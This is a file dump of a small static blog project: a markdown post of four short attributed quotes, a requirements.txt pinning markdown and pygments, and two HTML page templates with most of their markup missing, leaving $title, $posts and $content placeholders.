-------------------------------------------------------------------------------- /posts/2024-04-28-quotes/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: live 3 | date: 2024-04-28 4 | title: Quotes 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | "Wir müssen wissen. Wir werden wissen." — David Hilbert 9 | 10 | "Everyone who confuses correlation with causation eventually ends up dead." — Alan Cooper 11 | 12 | "I like offending people, because I think the people who get offended should be offended." — Linus Torvalds 13 | 14 | "The less confident you are, the more serious you have to act." — Tara Ploughman 15 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | markdown==3.3.3 2 | pygments==2.15.0 3 | -------------------------------------------------------------------------------- /templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Blog 7 | 8 | 9 | 10 | 37 | 38 | 39 |
40 | 47 |

Blog

48 |
49 |
50 | $posts 51 |
52 |
53 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /templates/post.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | $title 7 | 8 | 9 | 10 | 50 | 51 | 52 |
53 | 60 | < Other articles 61 |
62 |
63 |

$title

64 |

65 | Author$author 68 | Date$date 71 |

72 | $content 73 |
74 |
75 | 81 | 82 | 83 | --------------------------------------------------------------------------------